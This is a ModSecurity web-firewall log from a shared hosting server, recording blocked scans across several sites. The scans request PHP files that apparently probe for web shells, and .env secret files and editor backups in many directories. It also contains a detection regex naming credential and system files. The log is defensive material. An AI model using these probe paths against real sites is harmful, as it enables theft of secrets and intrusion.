[Tue May 26 19:53:07.376821 2026] [security2:error] [pid 86490:tid 86647] [client 74.249.173.207:4890] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkHAAAAKA"]
[Tue May 26 19:53:07.376912 2026] [security2:error] [pid 86490:tid 86647] [client 74.249.173.207:4890] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/xmrlpc.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkHAAAAKA"]
[Tue May 26 19:53:07.503468 2026] [security2:error] [pid 86490:tid 86702] [client 74.249.173.207:4925] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkIwAAANc"]
[Tue May 26 19:53:07.503559 2026] [security2:error] [pid 86490:tid 86702] [client 74.249.173.207:4925] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/class.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkIwAAANc"]
[Tue May 26 19:53:07.644074 2026] [security2:error] [pid 86490:tid 86650] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkGQAAAKM"]
[Tue May 26 19:53:07.684372 2026] [security2:error] [pid 86490:tid 86646] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/portfolio-app/api/.env"] [unique_id "ahWsy1ZMwN0DpLVWo6KkLQAAAJ8"]
[Tue May 26 19:53:07.707010 2026] [security2:error] [pid 86490:tid 86633] [client 74.249.173.207:4902] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkLwAAAJI"]
[Tue May 26 19:53:07.707087 2026] [security2:error] [pid 86490:tid 86633] [client 74.249.173.207:4902] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/goods.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkLwAAAJI"]
[Tue May 26 19:53:07.823166 2026] [security2:error] [pid 86490:tid 86726] [client 191.96.11.128:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "earthone.me"] [uri "/index.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkLAAAAO8"]
[Tue May 26 19:53:07.844543 2026] [security2:error] [pid 86490:tid 86620] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/bash/.env"] [unique_id "ahWsy1ZMwN0DpLVWo6KkMAAAAIU"]
[Tue May 26 19:53:07.977446 2026] [security2:error] [pid 86490:tid 86651] [client 74.249.173.207:4169] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkNwAAAKQ"]
[Tue May 26 19:53:07.977547 2026] [security2:error] [pid 86490:tid 86651] [client 74.249.173.207:4169] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/info.php"] [unique_id "ahWsy1ZMwN0DpLVWo6KkNwAAAKQ"]
[Tue May 26 19:53:08.004171 2026] [security2:error] [pid 86490:tid 86718] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/catalogue/.env"] [unique_id "ahWszFZMwN0DpLVWo6KkOgAAAOc"]
[Tue May 26 19:53:08.106514 2026] [security2:error] [pid 86490:tid 86688] [client 74.249.173.207:4924] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahWszFZMwN0DpLVWo6KkPQAAAMk"]
[Tue May 26 19:53:08.106619 2026] [security2:error] [pid 86490:tid 86688] [client 74.249.173.207:4924] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/as.php"] [unique_id "ahWszFZMwN0DpLVWo6KkPQAAAMk"]
[Tue May 26 19:53:08.276758 2026] [security2:error] [pid 86490:tid 86715] [client 74.249.173.207:4886] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahWszFZMwN0DpLVWo6KkRwAAAOQ"]
[Tue May 26 19:53:08.276864 2026] [security2:error] [pid 86490:tid 86715] [client 74.249.173.207:4886] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/bb.php"] [unique_id "ahWszFZMwN0DpLVWo6KkRwAAAOQ"]
[Tue May 26 19:53:08.488674 2026] [security2:error] [pid 86490:tid 86696] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/orders/.env"] [unique_id "ahWszFZMwN0DpLVWo6KkSgAAANE"]
[Tue May 26 19:53:08.500683 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:4889] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWszFZMwN0DpLVWo6KkTQAAAJ4"]
[Tue May 26 19:53:08.500759 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:4889] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/about.php"] [unique_id "ahWszFZMwN0DpLVWo6KkTQAAAJ4"]
[Tue May 26 19:53:08.534094 2026] [security2:error] [pid 86490:tid 86741] [client 114.119.130.18:62523] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moes-art.com"] [uri "/site/wp-content/uploads/2020/07/favicon.ico"] [unique_id "ahWszFZMwN0DpLVWo6KkTgAAAP4"], referer: http://moes-art.com/site/wp-content/uploads/2020/07/favicon.ico
[Tue May 26 19:53:08.635036 2026] [security2:error] [pid 86490:tid 86657] [client 74.249.173.207:4175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWszFZMwN0DpLVWo6KkTwAAAKo"]
[Tue May 26 19:53:08.635182 2026] [security2:error] [pid 86490:tid 86657] [client 74.249.173.207:4175] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/222.php"] [unique_id "ahWszFZMwN0DpLVWo6KkTwAAAKo"]
[Tue May 26 19:53:08.649150 2026] [security2:error] [pid 86490:tid 86662] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/Tests/Application/.env"] [unique_id "ahWszFZMwN0DpLVWo6KkUAAAAK8"]
[Tue May 26 19:53:08.807274 2026] [security2:error] [pid 86490:tid 86687] [client 74.249.173.207:4166] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/test1.php"] [unique_id "ahWszFZMwN0DpLVWo6KkVwAAAMg"]
[Tue May 26 19:53:08.807404 2026] [security2:error] [pid 86490:tid 86687] [client 74.249.173.207:4166] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/test1.php"] [unique_id "ahWszFZMwN0DpLVWo6KkVwAAAMg"]
[Tue May 26 19:53:09.039207 2026] [security2:error] [pid 86490:tid 86729] [client 74.249.173.207:4160] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahWszVZMwN0DpLVWo6KkZAAAAPI"]
[Tue May 26 19:53:09.039317 2026] [security2:error] [pid 86490:tid 86729] [client 74.249.173.207:4160] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-mail.php"] [unique_id "ahWszVZMwN0DpLVWo6KkZAAAAPI"]
[Tue May 26 19:53:09.063348 2026] [security2:error] [pid 86490:tid 86652] [client 191.96.11.128:49284] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "earthone.me"] [uri "/.env"] [unique_id "ahWszVZMwN0DpLVWo6KkZwAAAKU"]
[Tue May 26 19:53:09.171432 2026] [security2:error] [pid 86490:tid 86685] [client 74.249.173.207:4174] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWszVZMwN0DpLVWo6KkbgAAAMY"]
[Tue May 26 19:53:09.171552 2026] [security2:error] [pid 86490:tid 86685] [client 74.249.173.207:4174] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp.php"] [unique_id "ahWszVZMwN0DpLVWo6KkbgAAAMY"]
[Tue May 26 19:53:09.187742 2026] [security2:error] [pid 86490:tid 86509] [remote 136.110.38.51:45126] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 51.38.110.136.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWszVZMwN0DpLVWo6KkYAAA2hI"]
[Tue May 26 19:53:09.295939 2026] [security2:error] [pid 86490:tid 86692] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/stg/.env"] [unique_id "ahWszVZMwN0DpLVWo6KkbwAAAM0"]
[Tue May 26 19:53:09.381856 2026] [security2:error] [pid 86490:tid 86726] [client 74.249.173.207:4879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWszVZMwN0DpLVWo6KkcAAAAO8"]
[Tue May 26 19:53:09.381930 2026] [security2:error] [pid 86490:tid 86726] [client 74.249.173.207:4879] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/adminfuns.php"] [unique_id "ahWszVZMwN0DpLVWo6KkcAAAAO8"]
[Tue May 26 19:53:09.508378 2026] [security2:error] [pid 86490:tid 86620] [client 74.249.173.207:4168] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahWszVZMwN0DpLVWo6KkcgAAAIU"]
[Tue May 26 19:53:09.508506 2026] [security2:error] [pid 86490:tid 86620] [client 74.249.173.207:4168] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/php8.php"] [unique_id "ahWszVZMwN0DpLVWo6KkcgAAAIU"]
[Tue May 26 19:53:09.763139 2026] [security2:error] [pid 86490:tid 86710] [client 74.249.173.207:38912] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahWszVZMwN0DpLVWo6KkgAAAAN8"]
[Tue May 26 19:53:09.763236 2026] [security2:error] [pid 86490:tid 86710] [client 74.249.173.207:38912] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/ioxi-o.php"] [unique_id "ahWszVZMwN0DpLVWo6KkgAAAAN8"]
[Tue May 26 19:53:09.910265 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWszVZMwN0DpLVWo6KkggAAAIo"]
[Tue May 26 19:53:09.910394 2026] [security2:error] [pid 86490:tid 86625] [client 74.249.173.207:4881] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/edit.php"] [unique_id "ahWszVZMwN0DpLVWo6KkggAAAIo"]
[Tue May 26 19:53:09.941234 2026] [security2:error] [pid 86490:tid 86634] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/sh/.env"] [unique_id "ahWszVZMwN0DpLVWo6KkgwAAAJM"]
[Tue May 26 19:53:10.045694 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:38917] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahWszlZMwN0DpLVWo6KkhwAAAJ4"]
[Tue May 26 19:53:10.045832 2026] [security2:error] [pid 86490:tid 86645] [client 74.249.173.207:38917] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/sid3.php"] [unique_id "ahWszlZMwN0DpLVWo6KkhwAAAJ4"]
[Tue May 26 19:53:10.100957 2026] [security2:error] [pid 86490:tid 86745] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/office/.env"] [unique_id "ahWszlZMwN0DpLVWo6KkjwAAAQI"]
[Tue May 26 19:53:10.250237 2026] [security2:error] [pid 86490:tid 86714] [client 157.90.155.240:7936] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "thegoodsporting.com"] [uri "/index.php"] [unique_id "ahWszlZMwN0DpLVWo6KkkgAAAOM"], referer: https://thegoodsporting.com
[Tue May 26 19:53:10.251663 2026] [security2:error] [pid 86490:tid 86663] [client 74.249.173.207:4888] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWszlZMwN0DpLVWo6KkkwAAALA"]
[Tue May 26 19:53:10.251778 2026] [security2:error] [pid 86490:tid 86663] [client 74.249.173.207:4888] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/166.php"] [unique_id "ahWszlZMwN0DpLVWo6KkkwAAALA"]
[Tue May 26 19:53:10.385817 2026] [security2:error] [pid 86490:tid 86636] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWszVZMwN0DpLVWo6KkhgAAAJU"]
[Tue May 26 19:53:10.423027 2026] [security2:error] [pid 86490:tid 86679] [client 185.177.72.53:55596] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "www.pronumbers.com.au"] [uri "/connect.php.swp"] [unique_id "ahWszlZMwN0DpLVWo6KklQAAAMA"]
[Tue May 26 19:53:10.454451 2026] [security2:error] [pid 86490:tid 86633] [client 74.249.173.207:4211] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/test.php"] [unique_id "ahWszlZMwN0DpLVWo6KkmQAAAJI"]
[Tue May 26 19:53:10.454564 2026] [security2:error] [pid 86490:tid 86633] [client 74.249.173.207:4211] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/test.php"] [unique_id "ahWszlZMwN0DpLVWo6KkmQAAAJI"]
[Tue May 26 19:53:10.656224 2026] [security2:error] [pid 86490:tid 86731] [client 74.249.173.207:4162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/phpinfo/info.php"] [unique_id "ahWszlZMwN0DpLVWo6KkpQAAAPQ"]
[Tue May 26 19:53:10.656382 2026] [security2:error] [pid 86490:tid 86731] [client 74.249.173.207:4162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/phpinfo/info.php"] [unique_id "ahWszlZMwN0DpLVWo6KkpQAAAPQ"]
[Tue May 26 19:53:10.795891 2026] [security2:error] [pid 86490:tid 86660] [client 74.249.173.207:4907] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.movehostel.com.md-74.webhostbox.net"] [uri "/wp-the.php"] [unique_id "ahWszlZMwN0DpLVWo6KkqQAAAK0"]
